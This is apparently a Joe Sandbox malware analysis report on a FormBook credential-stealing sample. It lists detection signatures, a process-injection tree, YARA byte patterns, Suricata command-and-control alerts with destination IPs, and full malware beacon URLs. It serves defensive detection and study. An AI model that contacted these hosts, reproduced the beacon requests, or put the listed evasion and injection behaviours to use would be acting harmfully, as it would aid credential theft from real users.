Edit tour

Windows Analysis Report
LisectAVT_2403002B_466.exe

Overview

General Information

Sample name:	LisectAVT_2403002B_466.exe
Analysis ID:	1481629
MD5:	cc75546dca8931513952d924791b54f0
SHA1:	cdda63091a813cac9da8292d871fd1d1c403c3d4
SHA256:	0d2bd5b1931e12154a0d298b8d30d7ebe712809830b70635f0320b801c2cc7be
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

LisectAVT_2403002B_466.exe (PID: 6396 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002B_466.exe" MD5: CC75546DCA8931513952D924791B54F0)

svchost.exe (PID: 428 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002B_466.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

ljryBmFNsYlm.exe (PID: 6648 cmdline: "C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

DevicePairingWizard.exe (PID: 6200 cmdline: "C:\Windows\SysWOW64\DevicePairingWizard.exe" MD5: 2A4C038870FD0083037A7B07FEAAEDE5)

ljryBmFNsYlm.exe (PID: 5880 cmdline: "C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 2924 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.4471233765.0000000004A10000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4471233765.0000000004A10000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b950:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1571f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4469977289.0000000000B00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4469977289.0000000000B00000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b950:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1571f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2202307920.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2202307920.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ef93:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x18d62:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4473303315.0000000005790000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.4473303315.0000000005790000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6b8ee:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x556bd:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2204228990.0000000003590000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2204228990.0000000003590000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b950:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1571f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4471294654.0000000004A50000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4471294654.0000000004A50000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b950:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1571f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.4471197321.00000000057B0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.4471197321.00000000057B0000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x891b36:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x87b905:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2204277734.0000000005DD0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2204277734.0000000005DD0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x891b36:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x87b905:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e193:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17f62:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ef93:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x18d62:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\LisectAVT_2403002B_466.exe", CommandLine: "C:\Users\user\Desktop\LisectAVT_2403002B_466.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002B_466.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe, ParentProcessId: 6396, ParentProcessName: LisectAVT_2403002B_466.exe, ProcessCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002B_466.exe", ProcessId: 428, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\LisectAVT_2403002B_466.exe", CommandLine: "C:\Users\user\Desktop\LisectAVT_2403002B_466.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002B_466.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe, ParentProcessId: 6396, ParentProcessName: LisectAVT_2403002B_466.exe, ProcessCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002B_466.exe", ProcessId: 428, ProcessName: svchost.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 67.198.129.29

Timestamp:	2024-07-25T12:09:49.922415+0200
SID:	2855464
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 40.68.123.157 - Destination IP: 192.168.2.5

Timestamp:	2024-07-25T12:06:52.373062+0200
SID:	2022930
Source Port:	443
Destination Port:	49704
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 67.198.129.29

Timestamp:	2024-07-25T12:09:46.874627+0200
SID:	2855464
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 104.21.25.75

Timestamp:	2024-07-25T12:10:37.646592+0200
SID:	2855464
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 66.96.162.141

Timestamp:	2024-07-25T12:09:40.913870+0200
SID:	2855465
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 74.208.236.162

Timestamp:	2024-07-25T12:07:09.523761+0200
SID:	2855465
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 67.223.117.189

Timestamp:	2024-07-25T12:08:35.120347+0200
SID:	2855464
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 89.31.143.90

Timestamp:	2024-07-25T12:07:32.998238+0200
SID:	2855465
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 91.195.240.19

Timestamp:	2024-07-25T12:09:22.691671+0200
SID:	2855464
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 23.251.54.212

Timestamp:	2024-07-25T12:09:11.686976+0200
SID:	2855465
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 91.195.240.19

Timestamp:	2024-07-25T12:09:25.225242+0200
SID:	2855465
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 23.251.54.212

Timestamp:	2024-07-25T12:08:49.302083+0200
SID:	2855464
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 23.251.54.212

Timestamp:	2024-07-25T12:08:46.770826+0200
SID:	2855464
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 91.195.240.19

Timestamp:	2024-07-25T12:08:24.018743+0200
SID:	2855465
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 67.223.117.189

Timestamp:	2024-07-25T12:08:32.486164+0200
SID:	2855464
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 67.198.129.29

Timestamp:	2024-07-25T12:09:52.441240+0200
SID:	2855464
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 217.76.156.252

Timestamp:	2024-07-25T12:07:46.472374+0200
SID:	2855465
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 91.195.240.19

Timestamp:	2024-07-25T12:09:17.619583+0200
SID:	2855464
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 91.195.240.19

Timestamp:	2024-07-25T12:10:20.958027+0200
SID:	2855464
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 217.76.156.252

Timestamp:	2024-07-25T12:07:41.434812+0200
SID:	2855464
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 23.251.54.212

Timestamp:	2024-07-25T12:08:44.240324+0200
SID:	2855464
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 89.31.143.90

Timestamp:	2024-07-25T12:07:30.411485+0200
SID:	2855464
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 91.195.240.19

Timestamp:	2024-07-25T12:10:28.886427+0200
SID:	2855465
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 91.195.240.19

Timestamp:	2024-07-25T12:08:21.514425+0200
SID:	2855464
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 104.21.25.75

Timestamp:	2024-07-25T12:10:35.063527+0200
SID:	2855464
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 217.76.156.252

Timestamp:	2024-07-25T12:07:43.968352+0200
SID:	2855464
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 91.195.240.19

Timestamp:	2024-07-25T12:08:16.526647+0200
SID:	2855464
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 66.96.162.141

Timestamp:	2024-07-25T12:09:36.188464+0200
SID:	2855464
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 67.198.129.29

Timestamp:	2024-07-25T12:09:55.007150+0200
SID:	2855465
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 3.33.130.190

Timestamp:	2024-07-25T12:10:15.232066+0200
SID:	2855465
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 67.223.117.189

Timestamp:	2024-07-25T12:08:37.592119+0200
SID:	2855465
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 104.21.25.75

Timestamp:	2024-07-25T12:10:40.569386+0200
SID:	2855464
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 66.96.162.141

Timestamp:	2024-07-25T12:09:32.084340+0200
SID:	2855464
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 91.195.240.19

Timestamp:	2024-07-25T12:10:26.084850+0200
SID:	2855464
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 67.223.117.189

Timestamp:	2024-07-25T12:08:29.979171+0200
SID:	2855464
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 89.31.143.90

Timestamp:	2024-07-25T12:07:25.250658+0200
SID:	2855464
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 91.195.240.19

Timestamp:	2024-07-25T12:10:23.688421+0200
SID:	2855464
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 3.33.130.190

Timestamp:	2024-07-25T12:10:06.547993+0200
SID:	2855464
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 91.195.240.19

Timestamp:	2024-07-25T12:08:19.012550+0200
SID:	2855464
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 91.195.240.19

Timestamp:	2024-07-25T12:09:20.128346+0200
SID:	2855464
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 3.33.130.190

Timestamp:	2024-07-25T12:10:04.098923+0200
SID:	2855464
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 3.33.130.190

Timestamp:	2024-07-25T12:10:00.827604+0200
SID:	2855464
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 66.96.162.141

Timestamp:	2024-07-25T12:09:33.630376+0200
SID:	2855464
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 52.165.165.26 - Destination IP: 192.168.2.5

Timestamp:	2024-07-25T12:07:30.384981+0200
SID:	2022930
Source Port:	443
Destination Port:	49715
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 89.31.143.90

Timestamp:	2024-07-25T12:07:27.870797+0200
SID:	2855464
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 217.76.156.252

Timestamp:	2024-07-25T12:07:38.899660+0200
SID:	2855464
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: LisectAVT_2403002B_466.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.pandafitnessboo.com/d5fo/	Avira URL Cloud: Label: malware
Source: http://www.pandafitnessboo.com/d5fo/?7b7D=ZpdAgvspmy+hTWfIGO3yX+xvrXsAMei4bBOt8BxrswmHE1awNdipNiT+j4hdfFyjFWMSgEHKkrcEvKgvyxqjFaD+81oW/DCEN2Oo1sUO/kySitSS9PIrivUN0n61HzGWTA==&jlx=Zd48SBF0d	Avira URL Cloud: Label: malware
Source: http://www.bieniastest.xyz/d5fo/?7b7D=LMFtkAbNwZ2elB2GqME+IyQxX7DpzdHWKaIeqICYjgo7Pf7uTIFX4zBwXYBOYcYwGUmItxrSVLCWdjm98wNi/v/M/fTrXywXbqzKp2nVAwJXJwrN8i8cZj3fKe75XwP3Sw==&jlx=Zd48SBF0d	Avira URL Cloud: Label: malware
Source: http://www.bieniastest.xyz/d5fo/	Avira URL Cloud: Label: malware
Source: http://www.energysecrets.online/d5fo/	Avira URL Cloud: Label: malware
Source: http://www.energysecrets.online/d5fo/?7b7D=uO5Cag4gyB16R4iku6nvf5dW+UrTPsxCj8IlAS8oNZUsLlnW35hToihdihlq36/h3E+gT/kMW6N0rvSH4h3g2fSBlwf/dqlLAFh1+9LorWG4QUGEfHw1eqFMmW/Mf4Jk1w==&jlx=Zd48SBF0d	Avira URL Cloud: Label: malware

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4471233765.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4469977289.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2202307920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4473303315.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2204228990.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4471294654.0000000004A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4471197321.00000000057B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2204277734.0000000005DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: LisectAVT_2403002B_466.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ljryBmFNsYlm.exe, 00000003.00000002.4469976906.0000000000A6E000.00000002.00000001.01000000.00000004.sdmp, ljryBmFNsYlm.exe, 00000006.00000000.2279267381.0000000000A6E000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: LisectAVT_2403002B_466.exe, 00000000.00000003.2038848280.0000000003490000.00000004.00001000.00020000.00000000.sdmp, LisectAVT_2403002B_466.exe, 00000000.00000003.2038136685.0000000003630000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2110484222.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2203306584.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2203306584.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2108816255.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 00000004.00000003.2202437178.0000000004910000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 00000004.00000002.4471467623.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, 00000004.00000002.4471467623.0000000004E0E000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, 00000004.00000003.2205317854.0000000004AC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: LisectAVT_2403002B_466.exe, 00000000.00000003.2038848280.0000000003490000.00000004.00001000.00020000.00000000.sdmp, LisectAVT_2403002B_466.exe, 00000000.00000003.2038136685.0000000003630000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2110484222.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2203306584.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2203306584.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2108816255.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, DevicePairingWizard.exe, 00000004.00000003.2202437178.0000000004910000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 00000004.00000002.4471467623.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, 00000004.00000002.4471467623.0000000004E0E000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, 00000004.00000003.2205317854.0000000004AC5000.00000004.00000020.00020000.00000000.sdmp
